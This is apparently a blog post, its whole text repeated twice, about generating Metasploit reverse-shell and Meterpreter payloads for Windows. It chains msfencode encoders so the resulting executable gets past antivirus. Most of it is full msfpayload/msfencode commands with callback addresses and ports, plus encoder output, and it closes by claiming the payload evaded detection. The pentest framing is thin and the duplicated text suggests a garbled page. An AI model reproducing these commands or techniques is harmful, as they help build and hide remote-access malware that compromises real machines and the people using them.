In the previous articles, we have seen how to create a simple backdoor for exploiting windows machines simple backdoor.
The goal of your penetration test might be to test detection mechanisms in your organization, such as the intrusion detection
systems (IDS) or intrusion prevention systems (IPS). When you are performing a penetration test, nothing is more embarrassing
than being caught by antivirus software. How did your detection mechanisms respond to stealthy attacks? What did they catch
and, more importantly, what did they miss? If the attacker was successful, how is she hiding her presence on your organization’s
hosts?
One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. A common
misconception is that the antivirus engines are actually detecting the shellcode, and therefore, the best way to avoid antivirus
detection is to pick an encoder that the antivirus engine cannot handle, or encode many times. After all, those are both
prominent options of msfencode.
First of all, we’ll run a simple encoding of an MSF payload by importing raw output from msfpayload into msfencode to see how
the result affects our antivirus detection:
root@kali:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.132 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t
exe > /var/www/payload.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
When you test our payload with antivirus , we see that it’s detected.
Multi-encoding :
In the preceding example, the shikata_ga_nai encoding is polymorphic, meaning that the payload will change each time the
script is run. Of course, the payload that an antivirus product will flag is a mystery: Every time you generate a payload, the same
antivirus program can flag it once and miss it another time.
root@kali:/# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai
-c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown
-c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
Here we use five counts at .. of shikata_ga_nai, feeding the code in raw format at .. into two counts of alpha_upper encoding.
This Time when you scan with antivirus, You can see we have successfully slipped our payload past the antivirus engine.
The goal of your penetration test might be to test detection mechanisms in your organization, such as the intrusion detection
systems (IDS) or intrusion prevention systems (IPS). When you are performing a penetration test, nothing is more embarrassing
than being caught by antivirus software. How did your detection mechanisms respond to stealthy attacks? What did they catch
and, more importantly, what did they miss? If the attacker was successful, how is she hiding her presence on your organization’s
hosts?
One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. A common
misconception is that the antivirus engines are actually detecting the shellcode, and therefore, the best way to avoid antivirus
detection is to pick an encoder that the antivirus engine cannot handle, or encode many times. After all, those are both
prominent options of msfencode.
First of all, we’ll run a simple encoding of an MSF payload by importing raw output from msfpayload into msfencode to see how
the result affects our antivirus detection:
root@kali:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.132 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t
exe > /var/www/payload.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
When you test our payload with antivirus , we see that it’s detected.
Multi-encoding :
In the preceding example, the shikata_ga_nai encoding is polymorphic, meaning that the payload will change each time the
script is run. Of course, the payload that an antivirus product will flag is a mystery: Every time you generate a payload, the same
antivirus program can flag it once and miss it another time.
root@kali:/# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai
-c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown
-c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
Here we use five counts at .. of shikata_ga_nai, feeding the code in raw format at .. into two counts of alpha_upper encoding.
This Time when you scan with antivirus, You can see we have successfully slipped our payload past the antivirus engine.
No comments:
Post a Comment